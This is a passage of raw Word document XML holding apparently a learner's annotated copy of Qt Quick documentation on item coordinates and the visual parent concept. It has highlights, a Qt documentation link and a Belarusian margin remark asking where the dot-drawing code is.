      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-coordinates-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-coordinates-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/visual-coordinates-example.png"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"http://doc.qt.io/qt-5/images/visual-coordinates-example.png"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"http://doc.qt.io/qt-5/images/visual-coordinates-example.png"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"http://doc.qt.io/qt-5/images/visual-coordinates-example.png"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"http://doc.qt.io/qt-5/images/visual-coordinates-example.png"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"http://doc.qt.io/qt-5/images/visual-coordinates-example.png"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"http://doc.qt.io/qt-5/images/visual-coordinates-example.png"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"http://doc.qt.io/qt-5/images/visual-coordinates-example.png"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"http://doc.qt.io/qt-5/images/visual-coordinates-example.png"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"http://doc.qt.io/qt-5/images/visual-coordinates-example.png"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"http://doc.qt.io/qt-5/images/visual-coordinates-example.png"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"http://doc.qt.io/qt-5/images/visual-coordinates-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1039" type="#_x0000_t75" alt="" style="width:150.9pt;height:150.9pt">
            <v:imagedata r:id="rId1897" r:href="rId1898"/>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00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B34EC9">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000C4D6F">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B31A2B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00450174">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008E2997">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BD2950">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00253BB1">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this image the black dot is positioned at (0,0) within the item coordinates of the red rectangle. If the red rectangle was the root item of the scene, then the black dot would also be positioned at (0,0) in scene coordinates.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The blue rectangle is positioned at the white dot, (100,100), relative to the red rectangle's top left corner.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The green rectangle has no x,y specified, so its position defaults to (0,0). Because it is at (0,0) in the coordinates of its parent, the blue rectangle, it is positioned at the top left corner of that rectangle. This is the same point as the white dot at (100,100) in the coordinates of the red rectangle.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Я не зразумеў, дзе код, што малюе кропкі.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1899" w:history="1">
        <w:r w:rsidR="0060552B" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>visualcanvas</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>visualparent</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="0060552B" w:rsidRPr="0090003B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1534" w:name="_Toc483000862"/>
      <w:bookmarkStart w:id="1535" w:name="_Toc483003855"/>
      <w:bookmarkStart w:id="1536" w:name="_Toc483604208"/>
      <w:bookmarkStart w:id="1537" w:name="_Toc483605428"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Concepts - Visual Parent in Qt Quick</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1534"/>
      <w:bookmarkEnd w:id="1535"/>
      <w:bookmarkEnd w:id="1536"/>
      <w:bookmarkEnd w:id="1537"/>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="00BA1CDE" w:rsidRDefault="0060552B" w:rsidP="00BA1CDE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1538" w:name="_Toc483000863"/>
      <w:bookmarkStart w:id="1539" w:name="_Toc483003856"/>
      <w:bookmarkStart w:id="1540" w:name="_Toc483604209"/>
      <w:bookmarkStart w:id="1541" w:name="_Toc483605429"/>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visual Parent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1538"/>
      <w:bookmarkEnd w:id="1539"/>
      <w:bookmarkEnd w:id="1540"/>
      <w:bookmarkEnd w:id="1541"/>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When creating visual scenes with Qt Quick, it is important to understand the concept of the</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visual parent</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060552B" w:rsidRPr="0060552B" w:rsidRDefault="0060552B" w:rsidP="0060552B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The concept of the visual parent in Qt Quick is separate from, but related to, the concept of the</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object parent</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>within the</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1900" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">parent hierarchy. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All Q</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ML objects have an</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object parent</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which is determined by the</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1901" w:anchor="qml-object-declarations" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>object hierarchy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in which the object is declared. When working with </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module, the</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1902" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type is the base type for all visual items</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by this module, and it provides the concept of an additional</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visual parent</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as defined by an item's</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1903" w:anchor="parent-prop" w:history="1">
        <w:r w:rsidRPr="00BA1CDE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>parent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1CDE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Every item has a visual parent; </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if an item's</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1904" w:anchor="parent-prop" w:history="1">
        <w:r w:rsidRPr="0060552B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>parent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property value is</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="0060552B">
